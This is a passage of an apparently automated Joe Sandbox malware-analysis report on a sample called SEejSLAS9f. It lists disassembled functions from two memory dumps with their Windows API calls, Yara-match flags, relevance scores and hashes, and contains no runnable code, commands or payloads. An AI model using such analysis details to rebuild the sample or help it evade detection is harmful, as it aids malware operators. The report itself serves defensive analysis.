Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0043BA4E
IsValidCodePage.KERNEL32(00000000), ref: 0043BAA9
IsValidLocale.KERNEL32(?,00000001), ref: 0043BAB8
GetLocaleInfoW.KERNEL32(?,00001001,004307B5,00000040,?,004308D5,00000055,00000000,?,?,00000055,00000000), ref: 0043BB00
GetLocaleInfoW.KERNEL32(?,00001002,00430835,00000040), ref: 0043BB1F

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
String ID:
API String ID: 2287132625-0
Opcode ID: 09e7077a585d70c8480d4b1d78da616f19cbc20ae15e0cb08ae98176a4c780fb
Instruction ID: d022b458b050368e3858f313ea430915e0084ddf9245bc07a5b1b9775f8f1cbc
Opcode Fuzzy Hash: 09e7077a585d70c8480d4b1d78da616f19cbc20ae15e0cb08ae98176a4c780fb
Instruction Fuzzy Hash: E1516171A006059BEB10EFA5CC45BBF73B8FF4C701F14556BEA14E7290E7789A048BA9

Function 024ABBA9 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 024A2141: GetLastError.KERNEL32(?,?,0249A9EC,?,00000000,?,0249CDE6,0247247E,00000000,?,00451F20), ref: 024A2145
Part of subcall function 024A2141: _free.LIBCMT ref: 024A2178
Part of subcall function 024A2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024A21B9

Part of subcall function 024A2141: _free.LIBCMT ref: 024A21A0
Part of subcall function 024A2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024A21AD

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 024ABCB5
IsValidCodePage.KERNEL32(00000000), ref: 024ABD10
IsValidLocale.KERNEL32(?,00000001), ref: 024ABD1F
GetLocaleInfoW.KERNEL32(?,00001001,024A0A1C,00000040,?,024A0B3C,00000055,00000000,?,?,00000055,00000000), ref: 024ABD67
GetLocaleInfoW.KERNEL32(?,00001002,024A0A9C,00000040), ref: 024ABD86

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
String ID:
API String ID: 2287132625-0
Opcode ID: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
Instruction ID: f39d98138fc9caf841d53f0a252733b97d08d496ac0f154d6704bd27d57516a5
Opcode Fuzzy Hash: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
Instruction Fuzzy Hash: E3518071900209ABEB11DFA5DC54EBB77B9FF35708F04042FE904EB290EB719A458B61

Function 0042EAE0 Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 464COMMON

Download Yara Rule

Strings

C, xrefs: 0042EF48, 0042ED32, 0042EBC1
C, xrefs: 0042EAFD, 0042ECA8, 0042EECC, 0042EE66, 0042ECF6, 0042EC84

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID:
String ID: C$C
API String ID: 0-238425240
Opcode ID: 185f0ef558908b44b9225c7828f32a07078ec648b0e05d0c62af8d2f3fb84e81
Instruction ID: c20898a9e1ba257a9a920a277c678998c6649ecb9dd7e2fb432374692491c933
Opcode Fuzzy Hash: 185f0ef558908b44b9225c7828f32a07078ec648b0e05d0c62af8d2f3fb84e81
Instruction Fuzzy Hash: D2025C71E002299BDF14CFAAD9806AEBBF1EF88314F65416AD919E7380D734A9418B94

Function 0043B00A Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,004307BC,?,?,?,?,00430213,?,00000004), ref: 0043B0EC
_wcschr.LIBVCRUNTIME ref: 0043B17C
_wcschr.LIBVCRUNTIME ref: 0043B18A
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,004307BC,00000000,004308DC), ref: 0043B22D

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
String ID:
API String ID: 2444527052-0
Opcode ID: 0931e6da1e5e69565e8d8cf9fe0bd78167b9118aed70e948f35c6624fe6e05f7
Instruction ID: 51baba79e9d53baeee2bb674299bb26a4ab80324ce8bdae5682f18c88f981068
Opcode Fuzzy Hash: 0931e6da1e5e69565e8d8cf9fe0bd78167b9118aed70e948f35c6624fe6e05f7
Instruction Fuzzy Hash: 2A611871600305AADB25AB35DC46FAB73A8EF0C754F14142FFA15D7281EB78E90087E9

Function 024AB271 Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 024A2141: GetLastError.KERNEL32(?,?,0249A9EC,?,00000000,?,0249CDE6,0247247E,00000000,?,00451F20), ref: 024A2145
Part of subcall function 024A2141: _free.LIBCMT ref: 024A2178
Part of subcall function 024A2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024A21B9

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,024A0A23,?,?,?,?,024A047A,?,00000004), ref: 024AB353
_wcschr.LIBVCRUNTIME ref: 024AB3E3
_wcschr.LIBVCRUNTIME ref: 024AB3F1
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,024A0A23,00000000,024A0B43), ref: 024AB494

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
String ID:
API String ID: 2444527052-0
Opcode ID: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
Instruction ID: 11f06087d66e941983c32c890548f9314098312aa69c78252939f7d3e4083064
Opcode Fuzzy Hash: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
Instruction Fuzzy Hash: AC61D672600306AAEB25AB75DC65BBB73A9EF34718F14442FE905DB280EB74D541CBA0

Function 0043B3F5 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B449
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B49A
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B55A

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: ErrorInfoLastLocale$_free
String ID:
API String ID: 2834031935-0
Opcode ID: cf5f19ddaecfef394eb322faebabd4fba94275e162a49705b2643b4bebb04734
Instruction ID: c49451ec2ca19e0a4411bfa9fc43b71b3add14360d4f89f5b475bf5440394a21
Opcode Fuzzy Hash: cf5f19ddaecfef394eb322faebabd4fba94275e162a49705b2643b4bebb04734
Instruction Fuzzy Hash: D561A771501207AFEB289F25CC82BBA77A8EF08714F10507BEE05CA681E77DD951CB99

Function 0042A3D3 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0042A4CB
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0042A4D5
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0042A4E2

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: e3c43158b2ba7ac08fb42c40ba6f83f67e70d04cde29a4d11da33e8c3fa8252c
Instruction ID: 57e1c3994b5eabbb9df0cdc6b85fdffdc982c490f91e1a39e2279c764f1972c3
Opcode Fuzzy Hash: e3c43158b2ba7ac08fb42c40ba6f83f67e70d04cde29a4d11da33e8c3fa8252c
Instruction Fuzzy Hash: C231D6749112289BCB21DF64D9887CDB7B8BF08710F5042EAE81CA7250EB749F958F49

Function 0249A63A Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,0247DAD7), ref: 0249A732
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0247DAD7), ref: 0249A73C
UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,0247DAD7), ref: 0249A749

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
Instruction ID: 0b2e93ba2950da1c8cccccb63699f4fe7742ba26b32d44f259996fcecca0737f
Opcode Fuzzy Hash: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
Instruction Fuzzy Hash: E531C47491132C9BCB21EF65D98879DBBB8BF08710F5042EAE41CA7260E7349F858F45

Function 0042FE5F Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000,?,0042DFBF,00000003), ref: 0042FE80
TerminateProcess.KERNEL32(00000000,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000,?,0042DFBF,00000003), ref: 0042FE87
ExitProcess.KERNEL32 ref: 0042FE99

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
Instruction ID: 8c82726c098bb25b52c6af08a7b8273a11ccbc153eb778ed9611e77f52f83783
Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
Instruction Fuzzy Hash: B3E04635100148ABCF126F50ED08A5A3B39FF09B56F810439F8068B236CB39EE42CA88

Function 024A00C6 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,?,024A009C,00000000,00457970,0000000C,024A01F3,00000000,00000002,00000000), ref: 024A00E7
TerminateProcess.KERNEL32(00000000,?,024A009C,00000000,00457970,0000000C,024A01F3,00000000,00000002,00000000), ref: 024A00EE
ExitProcess.KERNEL32 ref: 024A0100

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
Instruction ID: a3fff2fd7053afa5b0704e78949c652652a7e07a9cad83244e716aa3a97a675d
Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
Instruction Fuzzy Hash: D4E04635000148ABCF126F54DD18B493B6AEB12B42F008029F9048B270CB36DA42DE40

Function 0247092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

GetProcAddress., xrefs: 024709DC, 024709DF, 024709E4
l, xrefs: 02470966
., xrefs: 0247095F

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: 2ba03358afb4aa586080315134d9a6fa806d0697afe7ce4ec3d947c4ea805d1a
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: AB3147B6911609DFDB10CF99C880AEEBBF9FF48324F15504AD851A7310D771EA45CBA4

Function 004351C0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00430213,?,00000004), ref: 00435213

Strings

GetLocaleInfoEx, xrefs: 004351D1, 004351DB

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: InfoLocale
String ID: GetLocaleInfoEx
API String ID: 2299586839-2904428671
Opcode ID: 64730f8190c419499ef2262387837ca1d33de23438e6729a1ee39c968f658f2e
Instruction ID: 6c622d5e0ad0a6d1c05e93c1424bc95a701370efe176ef79413d4e55be9de99b
Opcode Fuzzy Hash: 64730f8190c419499ef2262387837ca1d33de23438e6729a1ee39c968f658f2e
Instruction Fuzzy Hash: 97F02B31680318BBDB016F51CC02F6F7B21EF18B02F10006BFC0567290DA799E20AADE

Function 0249ED47 Relevance: 3.5, APIs: 2, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f0c45cb1db73e70c4158069b4bc17042fea2514ea4053169c41fd5e4a69dae0
Instruction ID: 0e7d969b980ba6dfd04e8a54758ca7fe4a2fce6f8c0d4c53bda4dffab6b2fe6b
Opcode Fuzzy Hash: 0f0c45cb1db73e70c4158069b4bc17042fea2514ea4053169c41fd5e4a69dae0
Instruction Fuzzy Hash: E3021A71E002199BDF14CFA9C9806AEBBF5EF88314F25826AD919E7384D731A945CF80

Function 02472605 Relevance: 3.1, APIs: 2, Instructions: 125nativewindowCOMMON

Download Yara Rule

APIs

NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 0247262C
PostQuitMessage.USER32(00000000), ref: 024727CA

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: MessageNtdllPostProc_QuitWindow
String ID:
API String ID: 4264772764-0
Opcode ID: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
Instruction ID: 87c017268568291181d22e74da28774018b180f19e1a84941c1995f0bc980cca
Opcode Fuzzy Hash: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
Instruction Fuzzy Hash: E941412596438095E730FFA5BC45B6633B0FF64B22F10252BD528CB2B2E3B28540C75E

Function 00436CBF Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00436CBA,?,?,00000008,?,?,0043F17B,00000000), ref: 00436EEC

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
Instruction ID: 64e3da0580c1687aacde15a9aed21cd267913b72937e2db5c37d982a735c0e1f
Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
Instruction Fuzzy Hash: 69B17D35210609EFD714CF28C48AB657BE0FF09324F26D659E899CF2A1C339E992CB44

Function 024A6F26 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,024A6F21,?,?,00000008,?,?,024AF3E2,00000000), ref: 024A7153

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
Instruction ID: b4bead52b7adc43ab3d09d59a5431fe39278b2192eb71e8ab72593d9b896b60c
Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
Instruction Fuzzy Hash: 7DB16F312106089FD725CF28C496B69BBE1FF55368F298659E89ACF3A1C335D992CF40

Function 0043B645 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B699

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: ErrorLast$_free$InfoLocale
String ID:
API String ID: 2955987475-0
Opcode ID: 7810810a637c9db15668f97de096a3c7ef99c71437c6b6a4b8ea3eac9e26399b
Instruction ID: d046272b768734764790121d12bbe36070ecd09619f9604c2cd6a0fe40238023
Opcode Fuzzy Hash: 7810810a637c9db15668f97de096a3c7ef99c71437c6b6a4b8ea3eac9e26399b
Instruction Fuzzy Hash: B421B67251020AABDB249E65CC42BBB73A8EF48314F10107BFE01D6281EB79DD44CB99

Function 024AB8AC Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 024A2141: GetLastError.KERNEL32(?,?,0249A9EC,?,00000000,?,0249CDE6,0247247E,00000000,?,00451F20), ref: 024A2145
Part of subcall function 024A2141: _free.LIBCMT ref: 024A2178
Part of subcall function 024A2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024A21B9

Part of subcall function 024A2141: _free.LIBCMT ref: 024A21A0
Part of subcall function 024A2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024A21AD

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 024AB900

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$InfoLocale
String ID:
API String ID: 2955987475-0
Opcode ID: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
Instruction ID: 894950bf890e9071168e19fddc440ec9a2c25e4b603c106ed9c8f004616b7ee1
Opcode Fuzzy Hash: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
Instruction Fuzzy Hash: BD21BE7295020AABDF24AE25DC61BBA77ADFF24318F00017FED01D6251EB799944DB50

Function 0043B2CD Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

EnumSystemLocalesW.KERNEL32(0043B3F5,00000001,00000000,?,004307B5,?,0043BA22,00000000,?,?,?), ref: 0043B33F

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem_free
String ID:
API String ID: 2016158738-0
Opcode ID: 209f9151615a4c87f00d4ea0f4f536091c38e7646036be2875dd2bb4f2ddf691
Instruction ID: 7307f244e070286786186ca11be292e9958ff85af34fd5d1bf47ea8df294ed07
Opcode Fuzzy Hash: 209f9151615a4c87f00d4ea0f4f536091c38e7646036be2875dd2bb4f2ddf691
Instruction Fuzzy Hash: D91106362007019FDB189F3988917BBB791FF84318F15452DEA8687B40D375A902C784

Function 024AB534 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 024A2141: GetLastError.KERNEL32(?,?,0249A9EC,?,00000000,?,0249CDE6,0247247E,00000000,?,00451F20), ref: 024A2145
Part of subcall function 024A2141: _free.LIBCMT ref: 024A2178
Part of subcall function 024A2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024A21B9

EnumSystemLocalesW.KERNEL32(0043B3F5,00000001,00000000,?,024A0A1C,?,024ABC89,00000000,?,?,?), ref: 024AB5A6

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_free
String ID:
API String ID: 2016158738-0
Opcode ID: ffafb835184771a8fee8a968cb960d5e6389dd898606227e18ebf87d931cb5f8
Instruction ID: 18d74d8b277ae358da7247cbfdf9b29731e7ca9d151032ff60f35e7071ef560c
Opcode Fuzzy Hash: ffafb835184771a8fee8a968cb960d5e6389dd898606227e18ebf87d931cb5f8
Instruction Fuzzy Hash: 3311E53A2007059FDB189F39C8A16BBBB92FF9475CB19482EDA4687B40D771B542CB40

Function 0043B875 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0043B613,00000000,00000000,?), ref: 0043B8A1

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: ErrorLast$InfoLocale_free
String ID:
API String ID: 787680540-0
Opcode ID: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
Instruction ID: 37b951b57323e1638715454beaabcd8ff4bbdb448c8d666509202632d17d74d0
Opcode Fuzzy Hash: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
Instruction Fuzzy Hash: 72F0F932910115BFDB2C6A6588057BB776CEF44764F15542FEE05A3280EB39FE4287D8

Function 024ABADC Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 024A2141: GetLastError.KERNEL32(?,?,0249A9EC,?,00000000,?,0249CDE6,0247247E,00000000,?,00451F20), ref: 024A2145
Part of subcall function 024A2141: _free.LIBCMT ref: 024A2178
Part of subcall function 024A2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024A21B9

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,024AB87A,00000000,00000000,?), ref: 024ABB08

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale_free
String ID:
API String ID: 787680540-0
Opcode ID: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
Instruction ID: 41c5c3d13b33bb4f1284a6ef611b21afcf9bf1ffa1d530003e2f9a81f71f35ca
Opcode Fuzzy Hash: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
Instruction Fuzzy Hash: F3F0F432A11115ABDB289A25CC55BBBB768FB6071CF04046AED06A3684EB70BE42C6D0

Function 0043B368 Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

EnumSystemLocalesW.KERNEL32(0043B645,00000001,?,?,004307B5,?,0043B9E6,004307B5,?,?,?,?,?,004307B5,?,?), ref: 0043B3B4

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem_free
String ID:
API String ID: 2016158738-0
Opcode ID: ff4b281e18efaa19658e03831a8d75929bd5cd68572c305843f6b1aa6eea9166
Instruction ID: e409c1f6f572afb8e53c6bef185f66c51efc5fed4ad0f11af6fa15d84cefb54f
Opcode Fuzzy Hash: ff4b281e18efaa19658e03831a8d75929bd5cd68572c305843f6b1aa6eea9166
Instruction Fuzzy Hash: 84F022362007045FDB159F3ADC91B6A7B90EF84328F15442EFE028B680D7B5AC028684

Function 024AB5CF Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 024A2141: GetLastError.KERNEL32(?,?,0249A9EC,?,00000000,?,0249CDE6,0247247E,00000000,?,00451F20), ref: 024A2145
Part of subcall function 024A2141: _free.LIBCMT ref: 024A2178
Part of subcall function 024A2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024A21B9

EnumSystemLocalesW.KERNEL32(0043B645,00000001,?,?,024A0A1C,?,024ABC4D,024A0A1C,?,?,?,?,?,024A0A1C,?,?), ref: 024AB61B

Memory Dump Source

